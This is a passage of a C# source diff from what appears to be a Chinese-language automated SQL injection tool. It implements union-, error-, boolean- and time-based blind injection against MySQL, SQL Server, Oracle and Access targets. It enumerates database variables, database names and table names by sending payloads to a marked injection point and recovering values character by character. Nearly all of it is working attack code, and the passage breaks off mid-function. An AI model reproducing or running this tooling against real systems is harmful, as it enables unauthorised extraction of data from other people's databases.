+ String pay_load = MySQL5.error_value.Replace("{data}", columns);
+ String result = getOneDataByUnionOrError(pay_load);
+ this.Invoke(new setVariableDelegate(setVariable), sv[0], result);
+
+ }
+
+ public void getVariablesByErrorBySQLServer(Object v)
+ {
+ String[] sv = v.ToString().Split(':');
+ List column_list = new List();
+ column_list.Add(sv[1]);
+ String pay_load = MSSQL.error_value.Replace("{data}", sv[1]);
+ String result = getOneDataByUnionOrError(pay_load);
+ //错误显示会HTML编码,所以需要HTML解码
+ result = HttpUtility.HtmlDecode(result);
+ this.Invoke(new setVariableDelegate(setVariable), sv[0], result);
+
+ }
+
+ public void getVariablesByErrorByOracle(Object v)
+ {
+ String[] sv = v.ToString().Split(':');
+ List column_list = new List();
+ column_list.Add(sv[1]);
+ String pay_load = Oracle.getErrorDataValue(sv[1], "", "", "");
+ String result = getOneHexDataByUnionOrError(pay_load);
+ this.Invoke(new setVariableDelegate(setVariable), sv[0], result);
+
+ }
+
+ //立即结束线程池
+ private void StopThread()
+ {
+ status = -1;
+ if (this.currentThread != null)
+ {
+ this.currentThread.Abort();
+ }
+ status = 0;
+ }
+
+ public void getVariablesByUnion(DBType dbType)
+ {
+ switch (dbType)
+ {
+
+ case DBType.Access:
+ MessageBox.Show("报告大侠,Access数据库不支持此功能!");
+ break;
+ case DBType.MySQL4: break;
+ case DBType.MySQL5:
+ this.dataCount = MySQL5.vers.Count;
+ if (MySQL5.vers != null && MySQL5.vers.Count > 0)
+ {
+ for (int j = 0; j < MySQL5.vers.Count; j++)
+ {
+ String v = MySQL5.vers[j];
+ //获取对应环境变量值
+ MyThreadPool.initThread(new ParameterizedThreadStart(getVariablesByUnionByMySQL5), v);
+ this.currentDataCount = j + 1;
+ }
+
+ }
+ else
+ {
+ MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/mysql5/vers.txt是否存在!");
+ }
+ break;
+ case DBType.SQLServer:
+ this.dataCount = MSSQL.vers.Count;
+ if (MSSQL.vers != null && MSSQL.vers.Count > 0)
+ {
+ for (int j = 0; j < MSSQL.vers.Count; j++)
+ {
+ String v = MSSQL.vers[j];
+ //获取对应环境变量值
+ MyThreadPool.initThread(new ParameterizedThreadStart(getVariablesByUnionBySQLServer), v);
+ this.currentDataCount = j + 1;
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/sqlserver/vers.txt是否存在!");
+ }
+ break;
+ case DBType.Oracle:
+ this.dataCount = Oracle.vers.Count;
+ if (Oracle.vers != null && Oracle.vers.Count > 0)
+ {
+ for (int j = 0; j < Oracle.vers.Count; j++)
+ {
+ String v = Oracle.vers[j];
+ //获取对应环境变量值
+ MyThreadPool.initThread(new ParameterizedThreadStart(getVariablesByUnionByOracle), v);
+ this.currentDataCount = j + 1;
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/sqlserver/vers.txt是否存在!");
+ }
+ break;
+ }
+
+ }
+ public void getVariablesByError(DBType dbType)
+ {
+ switch (dbType)
+ {
+
+ case DBType.Access:
+ MessageBox.Show("抱歉,Access数据库不支持错误显示方式注入!");
+ break;
+
+ case DBType.MySQL4:
+ MessageBox.Show("抱歉,MySQL4以下版本不支持错误显示方式注入!");
+ break;
+ case DBType.MySQL5:
+ this.dataCount = MySQL5.vers.Count;
+ if (MySQL5.vers != null && MySQL5.vers.Count > 0)
+ {
+ for (int j = 0; j < MySQL5.vers.Count; j++)
+ {
+ String v = MySQL5.vers[j];
+ //获取对应环境变量值
+ MyThreadPool.initThread(new ParameterizedThreadStart(getVariablesByErrorByMySQL5), v);
+ this.currentDataCount = j + 1;
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/mysql5/vers.txt是否存在!");
+ }
+ break;
+ case DBType.SQLServer:
+ this.dataCount = MSSQL.vers.Count;
+ if (MSSQL.vers != null && MSSQL.vers.Count > 0)
+ {
+ for (int j = 0; j < MSSQL.vers.Count; j++)
+ {
+ String v = MSSQL.vers[j];
+ //获取对应环境变量值
+ MyThreadPool.initThread(new ParameterizedThreadStart(getVariablesByErrorBySQLServer), v);
+ this.currentDataCount = j + 1;
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/sqlserver/vers.txt是否存在!");
+ }
+ break;
+ case DBType.Oracle:
+ this.dataCount = Oracle.vers.Count;
+ if (Oracle.vers != null && Oracle.vers.Count > 0)
+ {
+ for (int j = 0; j < Oracle.vers.Count; j++)
+ {
+ String v = Oracle.vers[j];
+ //获取对应环境变量值
+ MyThreadPool.initThread(new ParameterizedThreadStart(getVariablesByErrorByOracle), v);
+ this.currentDataCount = j + 1;
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/sqlserver/vers.txt是否存在!");
+ }
+ break;
+ }
+
+ }
+
+ public void getVariablesByBool(DBType dbType)
+ {
+
+ switch (dbType)
+ {
+
+ case DBType.Access:
+ MessageBox.Show("报告大侠,Access数据库不支持此功能!");
+ break;
+ case DBType.MySQL4:
+
+ break;
+ case DBType.MySQL5:
+ this.dataCount = MySQL5.vers.Count;
+ if (MySQL5.vers != null && MySQL5.vers.Count > 0)
+ {
+ for (int j = 0; j < MySQL5.vers.Count; j++)
+ {
+ String v = MySQL5.vers[j];
+ MyThreadPool.initThread(new ParameterizedThreadStart(getVariableByBoolByMySQL), v);
+ this.currentDataCount = j + 1;
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/mysql5/vers.txt是否存在!");
+ }
+ break;
+ case DBType.SQLServer:
+ this.dataCount = MSSQL.vers.Count;
+ if (MSSQL.vers != null && MSSQL.vers.Count > 0)
+ {
+ for (int j = 0; j < MSSQL.vers.Count; j++)
+ {
+ String v = MSSQL.vers[j];
+ //获取对应环境变量值
+ MyThreadPool.initThread(new ParameterizedThreadStart(getVariableByBoolBySQLServer), v);
+ this.currentDataCount = j + 1;
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/sqlserver/vers.txt是否存在!");
+ }
+ break;
+ case DBType.Oracle:
+ this.dataCount = Oracle.vers.Count;
+ if (Oracle.vers != null && Oracle.vers.Count > 0)
+ {
+ for (int j = 0; j < Oracle.vers.Count; j++)
+ {
+ String v = Oracle.vers[j];
+ MyThreadPool.initThread(new ParameterizedThreadStart(getVariableByBoolByOracle), v);
+ this.currentDataCount = j + 1;
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有读到相关数据库的环境变量文件,请检查配置文件:config/sqlserver/vers.txt是否存在!");
+ }
+
+ break;
+ }
+ }
+
+ /**
+ 获取环境变量
+ */
+ public void getVers()
+ {
+ //获取环境变量
+ this.data_lvw_ver.Items.Clear();
+ //检查注入配置
+ if (checkConfig())
+ {
+ //判断是否标记注入点
+ if (isSetInjectPoint())
+ {
+ switch (config.injectType)
+ {
+ case InjectType.Bool:
+ getVariablesByBool(config.dbType);
+ break;
+
+ case InjectType.Union:
+ getVariablesByUnion(config.dbType);
+ break;
+ case InjectType.Error:
+ getVariablesByError(config.dbType);
+ break;
+ case InjectType.Sleep:
+ getVariablesByBool(config.dbType);
+ break;
+ }
+
+ }
+
+ }
+
+ }
+ public Thread currentThread = null;
+ private void data_cms_tsmi_getVariable_Click(object sender, EventArgs e)
+ {
+ if (MyThreadPool.GetAliveThreadsCount() == 0)
+ {
+ status = 1;
+ currentThread = new Thread(getVers);
+ currentThread.Start();
+ }
+ else
+ {
+
+ MessageBox.Show("还有线程未结束,请稍后...");
+ }
+ }
+
+ public delegate void setVariableDelegate(String name, String value);
+ public void setVariable(String name, String value)
+ {
+ ListViewItem lvi = new ListViewItem(name);
+
+ lvi.SubItems.Add(value);
+ this.data_lvw_ver.Items.Add(lvi);
+ }
+
+ ///
+ /// 获取环境变量mysql bool
+ ///
+ ///
+ public void getVariableByBoolByMySQL(Object vers)
+ {
+ /*
+ if (config.keyType.Equals(KeyType.Time)) {
+ getVariableByBoolByMySQLSleep(vers);
+ }*/
+ try
+ {
+ String[] vs = vers.ToString().Split(':');
+
+ String payload_len = MySQL5.ver_length.Replace("{data}", vs[1]);
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ payload_len = MySQL5.getBoolCountBySleep(MySQL5.bool_length, config.maxTime).Replace("{data}", vs[1]);
+ }
+
+ int len = getValueByStepUp(payload_len,0, 10);
+ this.Invoke(new StringDelegate(log), vs[0] + "长度为-----:" + len);
+
+ String va_payload = MySQL5.ver_value.Replace("{data}", vs[1]);
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value, config.maxTime).Replace("{data}", vs[1]);
+ }
+
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ /*
+ String plen = null;
+ //是否判断多字节字符
+ Boolean pLen_isMax = false;
+ if ("1".Equals(vs[4]))
+ {
+ //开启多字节判断
+ //转换对应值判断是否多字节字符
+ plen = MySQL5.ver_length.Replace("data", MySQL5.mu_value.Replace("{data}", vs[1]).Replace("{index}", i + ""));
+ pLen_isMax = findKeyInBody(plen, 2);
+ }
+
+ //取值payload,替换对应下标值
+ String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ //多字节字符
+ if (pLen_isMax)
+ {
+ //MySQL采用hex
+ int mu_payload_len = getValue(plen, 2, 8);
+ int m_index = 0;
+ String[] ver_tmp = new String[mu_payload_len];
+ while (m_index < mu_payload_len)
+ {
+ //获取多字节
+ int ascii = getValue(tmp_va_payload, 0, 128);
+ ver_tmp[m_index] = ((char)ascii).ToString();
+ m_index++;
+ }
+ //设置值,这里由于是hex值,需要转换
+ value += Tools.unHex(Tools.convertToString(ver_tmp), config.db_encoding);
+ }
+ //单字节字符
+ else
+ {
+ int ascii = getValue(tmp_va_payload, 0, 255);
+ value += ((char)ascii).ToString();
+ }*/
+ String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ int ascii = getValue(tmp_va_payload, 0, 255);
+ value += ((char)ascii).ToString();
+ }
+ this.Invoke(new StringDelegate(log), vs[0] + "值为-----:" + value);
+ this.Invoke(new setVariableDelegate(setVariable), vs[0], value);
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+
+ }
+
+ public void getVariableByBoolByMySQLSleep(Object vers)
+ {
+ try
+ {
+ String[] vs = vers.ToString().Split(':');
+
+ String payload_len = MySQL5.getBoolCountBySleep(MySQL5.bool_length, config.maxTime).Replace("{data}", vs[1]);
+
+ int len = getValueByStepUp(payload_len, 0, 10);
+ this.Invoke(new StringDelegate(log), vs[0] + "长度为-----:" + len);
+ String va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value, config.maxTime).Replace("{data}", vs[1]);
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ /*此处忽略有中文的情况,这样可以提高速度
+ String plen = null;
+ //是否判断多字节字符
+ Boolean pLen_isMax = false;
+ if ("1".Equals(vs[4]))
+ {
+ //开启多字节判断
+ //转换对应值判断是否多字节字符
+ plen = MySQL5.ver_length.Replace("data", MySQL5.mu_value.Replace("{data}", vs[1]).Replace("{index}", i + ""));
+ pLen_isMax = findKeyInBody(plen, 2);
+ }
+
+ //取值payload,替换对应下标值
+ String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ //多字节字符
+ if (pLen_isMax)
+ {
+ //MySQL采用hex
+ int mu_payload_len = getValue(plen, 2, 8);
+ int m_index = 0;
+ String[] ver_tmp = new String[mu_payload_len];
+ while (m_index < mu_payload_len)
+ {
+ //获取多字节
+ int ascii = getValue(tmp_va_payload, 0, 128);
+ ver_tmp[m_index] = ((char)ascii).ToString();
+ m_index++;
+ }
+ //设置值,这里由于是hex值,需要转换
+ value += Tools.unHex(Tools.convertToString(ver_tmp), config.db_encoding);
+ }
+ //单字节字符
+ else
+ {
+ int ascii = getValue(tmp_va_payload, 0, 255);
+ value += ((char)ascii).ToString();
+ }*/
+ String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ int ascii = getValue(tmp_va_payload, 0, 255);
+ value += ((char)ascii).ToString();
+ }
+ this.Invoke(new StringDelegate(log), vs[0] + "值为-----:" + value);
+ this.Invoke(new setVariableDelegate(setVariable), vs[0], value);
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+
+ }
+
+
+ ///
+ /// 获取环境变量sqlserver bool
+ ///
+ ///
+ public void getVariableByBoolBySQLServer(Object vers)
+ {
+ try
+ {
+ String[] vs = vers.ToString().Split(':');
+ //判断变量长度
+ int len = getValueByStepUp(MSSQL.bool_length.Replace("{data}", vs[1]), 0, 10);
+ this.Invoke(new StringDelegate(log), vs[0] + "长度为-----:" + len);
+
+ String va_payload = MSSQL.bool_value.Replace("{data}", vs[1]);
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+
+ //select UNICODE(substring(@@version,{index},1))
+ //取值payload,替换对应下标值
+ String unicode_data_payload = MSSQL.unicode_value.Replace("{index}", i + "").Replace("{data}", vs[1] + "");
+ //取unicode转换后的长度
+ String unicode_data_len_payload = MSSQL.bool_length.Replace("{data}", unicode_data_payload);
+
+ //长度范围2-8支持大部分语言
+ int unicode_data_len = getValue(unicode_data_len_payload, 1, 8);
+ int m_index = 1;
+ StringBuilder unicodes = new StringBuilder();
+ while (m_index <= unicode_data_len)
+ {
+ //获取多字节
+ String substr_payload = MSSQL.substr.Replace("{data}", unicode_data_payload).Replace("{index}", m_index.ToString());
+ //单个unicode值范围是0-9
+ int unicode = getValue(MSSQL.bool_value.Replace("{data}", substr_payload), 0, 9);
+ unicodes.Append(unicode.ToString());
+ m_index++;
+ }
+
+ value += Tools.unHexByUnicode(int.Parse(unicodes.ToString()), config.db_encoding);
+ //设置值,这里由于是unicode值,需要转换
+ //String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ //int ascii = getValue(tmp_va_payload, 0, 255);
+ }
+ this.Invoke(new StringDelegate(log), vs[0] + "值为-----:" + value);
+ this.Invoke(new setVariableDelegate(setVariable), vs[0], value);
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+
+ ///
+ /// 获取环境变量oracle bool
+ ///
+ ///
+ public void getVariableByBoolByOracle(Object vers)
+ {
+ try
+ {
+ String[] vs = vers.ToString().Split(':');
+ //判断变量长度
+ int len = getValueByStepUp(Oracle.bool_length.Replace("{data}", vs[1]), 0, 10);
+ this.Invoke(new StringDelegate(log), vs[0] + "长度为-----:" + len);
+
+ String va_payload = Oracle.bool_value.Replace("{data}", vs[1]);
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ String dp = va_payload.Replace("{index}", i.ToString());
+ int ascii = getValue(dp, 0, 255);
+ value += (char)ascii;
+ }
+ this.Invoke(new StringDelegate(log), vs[0] + "值为-----:" + value);
+ this.Invoke(new setVariableDelegate(setVariable), vs[0], value);
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ delegate void addItemToListViewDelegate(ListViewItem item);
+
+ public void addItemToListView(ListViewItem item)
+ {
+ this.data_dbs_lvw_data.Items.Add(item);
+ }
+
+ delegate void addItemToListViewByColumnsDelegate(String colvs);
+ public void addItemToListViewByColumns(String colvs)
+ {
+ String[] colv = Regex.Split(colvs, "\\$\\$\\$");
+ ListViewItem lvi = null;
+ for (int i = 0; i < colv.Length; i++)
+ {
+ if (lvi == null)
+ {
+ lvi = new ListViewItem(colv[i]);
+ }
+ else
+ {
+
+ lvi.SubItems.Add(colv[i]);
+ }
+ }
+ this.data_dbs_lvw_data.Items.Add(lvi);
+ }
+
+ ///
+ /// 获取数据库名称
+ ///
+ /// 下标limit
+ public void getDBNameByBoolByMySQL(Object oindex)
+ {
+ try
+ {
+ int db_index = int.Parse(oindex.ToString());
+ //判断对应下标的数据库长度
+ String payload_len = MySQL5.ver_length.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString()));
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ payload_len = MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString())), config.maxTime);
+ }
+
+
+ //判断当前数据库长度限制1-50
+ int len = getValue(payload_len, 1, 50);
+ this.Invoke(new StringDelegate(log), "数据库" + (db_index + 1) + "长度为-----:" + len);
+
+ //判断当前数据库对应的ascii码
+ String va_payload = MySQL5.ver_value.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString()));
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString())), config.maxTime);
+ }
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ if (status != 1)
+ {
+ break;
+ }
+ //取值payload,替换对应下标值
+ String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ int ascii = getValue(tmp_va_payload, 0, 128);
+ value += ((char)ascii).ToString();
+ }
+ this.Invoke(new StringDelegate(log), "数据库" + db_index + "的名称为:" + value);
+ this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), value);
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+
+ ///
+ /// 获取数据库名称mssql
+ ///
+ /// 下标
+ public void getDBNameByBoolBySQLServer(Object oindex)
+ {
+ try
+ {
+ int db_index = int.Parse(oindex.ToString());
+ //判断对应下标的数据库长度
+ String data_payload = MSSQL.db_value.Replace("{index}", db_index.ToString());
+ int len = getValueByStepUp(MSSQL.bool_length.Replace("{data}", data_payload), 0, 10);
+
+ this.Invoke(new StringDelegate(log), "数据库" + db_index + "长度为-----:" + len);
+
+ //判断当前数据库对应的ascii码
+ String va_payload = MSSQL.bool_value.Replace("{data}", MSSQL.db_value.Replace("{index}", oindex.ToString()));
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ if (status != 1)
+ {
+ break;
+ }
+ //取值payload,替换对应下标值
+ //select UNICODE(substring(@@version,{index},1))
+ //取值payload,替换对应下标值
+ String unicode_data_payload = MSSQL.unicode_value.Replace("{index}", i + "").Replace("{data}", data_payload);
+ //取unicode转换后的长度
+ String unicode_data_len_payload = MSSQL.bool_length.Replace("{data}", unicode_data_payload);
+
+ //长度范围2-8支持大部分语言
+ int unicode_data_len = getValue(unicode_data_len_payload, 1, 8);
+ int m_index = 1;
+ StringBuilder unicodes = new StringBuilder();
+ while (m_index <= unicode_data_len && status == 1)
+ {
+ //获取多字节
+ String substr_payload = MSSQL.substr.Replace("{data}", unicode_data_payload).Replace("{index}", m_index.ToString());
+ //单个unicode值范围是0-9
+ int unicode = getValue(MSSQL.bool_value.Replace("{data}", substr_payload), 0, 9);
+ unicodes.Append(unicode.ToString());
+ m_index++;
+ }
+
+ if (Tools.convertToInt(unicodes.ToString()) > 255)
+ {
+ value += Tools.unHexByUnicode(int.Parse(unicodes.ToString()), config.db_encoding);
+ }
+ else
+ {
+ value += (char)Tools.convertToInt(unicodes.ToString());
+ }
+ }
+ this.Invoke(new StringDelegate(log), "数据库" + db_index + "的名称为:" + value);
+ this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), value);
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取数据库名称
+ ///
+ /// 下标limit
+ public void getDBNameByBoolByOracle(Object oindex)
+ {
+ try
+ {
+ int db_index = int.Parse(oindex.ToString());
+ //判断对应下标的数据库长度
+ String payload_len = Oracle.bool_length.Replace("{data}", Oracle.db_value.Replace("{index}", oindex.ToString()));
+
+ //判断当前数据库长度限制1-50
+ int len = getValue(payload_len, 1, 50);
+ this.Invoke(new StringDelegate(log), "数据库" + (db_index + 1) + "长度为-----:" + len);
+
+ //判断当前数据库对应的ascii码
+ String va_payload = Oracle.bool_value.Replace("{data}", Oracle.db_value.Replace("{index}", oindex.ToString()));
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ if (status != 1)
+ {
+ break;
+ }
+ //取值payload,替换对应下标值
+ String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ int ascii = getValue(tmp_va_payload, 0, 128);
+ value += ((char)ascii).ToString();
+ }
+ this.Invoke(new StringDelegate(log), "数据库" + db_index + "的名称为:" + value);
+ this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), value);
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+
+ ///
+ /// 获取数据库名称Union方式MySQL
+ ///
+ /// 下标limit
+ public void getDBNameByUnionByMySQL(Object oindex)
+ {
+ try
+ {
+ //获取数据库数量
+ List data_list = new List();
+ data_list.Add(MySQL5.db_value.Replace("{index}", oindex.ToString()));
+ String db_Name_data = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", data_list, null, null, -1);
+ String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", db_Name_data));
+ this.Invoke(new StringDelegate(log), "数据库" + oindex + "的名称为:" + result);
+ this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result);
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取数据库名称Union方式SQLServer
+ ///
+ /// 下标limit
+ public void getDBNameByUnionBySQLServer(Object oindex)
+ {
+ try
+ {
+ //获取数据库数量
+ String result = getOneDataByUnionOrError(MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.db_value, "", "", oindex.ToString()));
+ this.Invoke(new StringDelegate(log), "数据库" + oindex + "的名称为:" + result);
+ this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result);
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取数据库名称Union方式Oracle
+ ///
+ /// 下标limit
+ public void getDBNameByUnionByOracle(Object oindex)
+ {
+ try
+ {
+ //获取数据库数量
+ String result = getOneDataByUnionOrError(Oracle.getUnionDataValue(config.columnsCount, config.showColumn, Oracle.db_value, "", "", oindex.ToString()));
+ this.Invoke(new StringDelegate(log), "数据库" + oindex + "的名称为:" + result);
+ this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result);
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+
+ ///
+ /// 获取数据库名称Error方式mysql
+ ///
+ /// 下标limit
+ public void getDBNameByErrorByMySQL(Object oindex)
+ {
+ try
+ {
+ List data_list = new List();
+ data_list.Add(MySQL5.db_value.Replace("{index}", oindex.ToString()));
+ String db_Name_data = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1);
+ String result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", db_Name_data));
+ this.Invoke(new StringDelegate(log), "数据库" + oindex + "的名称为:" + result);
+ this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result);
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取数据库名称Error方式mysql
+ ///
+ /// 下标limit
+ public void getDBNameByErrorBySQLServer(Object oindex)
+ {
+ try
+ {
+ String result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.db_value.Replace("{index}", oindex.ToString())));
+ //HTML解码
+ result = HttpUtility.HtmlDecode(result);
+ this.Invoke(new StringDelegate(log), "数据库" + oindex + "的名称为:" + result);
+ this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result);
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取数据库名称Error方式oracle
+ ///
+ /// 下标limit
+ public void getDBNameByErrorByOracle(Object oindex)
+ {
+ try
+ {
+ String result = getOneHexDataByUnionOrError(Oracle.getErrorDataValue(Oracle.db_value, "", "", oindex.ToString()));
+ //HTML解码
+ result = HttpUtility.HtmlDecode(result);
+ this.Invoke(new StringDelegate(log), "数据库" + oindex + "的名称为:" + result);
+ this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result);
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+
+
+ ///
+ /// bool方式获取mysql表
+ ///
+ ///
+ public void getTableNameValueByBoolByMySQL(Object osn)
+ {
+
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ int selectIndex = sn.tn.Index;
+ //判断当前表长度
+ String data_payload = MySQL5.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit + "");
+ int len = 0;
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ len = getValue(MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", data_payload), config.maxTime), 1, 50);
+ }
+ else
+ {
+ len = getValue(MySQL5.ver_length.Replace("{data}", data_payload), 1, 50);
+ }
+
+
+ //判断当前数据库对应的ascii码
+ String va_payload = MySQL5.ver_value.Replace("{data}", data_payload);
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value, config.maxTime).Replace("{data}", data_payload);
+ }
+
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ //取值payload,替换对应下标值
+ String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ int ascii = getValue(tmp_va_payload, 0, 128);
+ value += ((char)ascii).ToString();
+ }
+ this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + value);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, value, "table");
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// bool方式获取oracle表
+ ///
+ ///
+ public void getTableNameValueByBoolByOracle(Object osn)
+ {
+
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ int selectIndex = sn.tn.Index;
+ //判断当前表长度
+ String data_payload = Oracle.table_value.Replace("{dbname}", sn.dbname).Replace("{index}", sn.limit + "");
+ int len = getValue(Oracle.bool_length.Replace("{data}", data_payload), 1, 50);
+
+ //判断当前数据库对应的ascii码
+ String va_payload = Oracle.bool_value.Replace("{data}", data_payload);
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ //取值payload,替换对应下标值
+ String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ int ascii = getValue(tmp_va_payload, 0, 128);
+ value += ((char)ascii).ToString();
+ }
+ this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + value);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, value, "table");
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+
+ public void getTableNameValueByBoolBySQLServer(Object osn)
+ {
+
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ //判断当前表长度
+ String data_payload = MSSQL.table_value.Replace("{index}", sn.limit.ToString()).Replace("{dbname}", sn.dbname);
+ int len = getValueByStepUp(MSSQL.bool_length.Replace("{data}", data_payload), 0, 10);
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ //取值payload,替换对应下标值
+ //select UNICODE(substring(@@version,{index},1))
+ //取值payload,替换对应下标值
+ String unicode_data_payload = MSSQL.unicode_value.Replace("{index}", i + "").Replace("{data}", data_payload);
+ //取unicode转换后的长度
+ String unicode_data_len_payload = MSSQL.bool_length.Replace("{data}", unicode_data_payload);
+
+ //长度范围2-8支持大部分语言
+ int unicode_data_len = getValue(unicode_data_len_payload, 1, 8);
+ int m_index = 1;
+ StringBuilder unicodes = new StringBuilder();
+ while (m_index <= unicode_data_len)
+ {
+ //获取多字节
+ String substr_payload = MSSQL.substr.Replace("{data}", unicode_data_payload).Replace("{index}", m_index.ToString());
+ //单个unicode值范围是0-9
+ int unicode = getValue(MSSQL.bool_value.Replace("{data}", substr_payload), 0, 9);
+ unicodes.Append(unicode.ToString());
+ m_index++;
+ }
+
+ if (Tools.convertToInt(unicodes.ToString()) > 255)
+ {
+ value += Tools.unHexByUnicode(int.Parse(unicodes.ToString()), config.db_encoding);
+ }
+ else
+ {
+ value += (char)Tools.convertToInt(unicodes.ToString());
+ }
+ }
+ this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + value);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, value, "table");
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+
+
+ ///
+ /// 获取表名,多线程调用mysql
+ ///
+ ///
+ public void getTableNameValueByUnionByMySQL(Object osn)
+ {
+
+ SelectNode sn = (SelectNode)osn;
+ List data_list = new List();
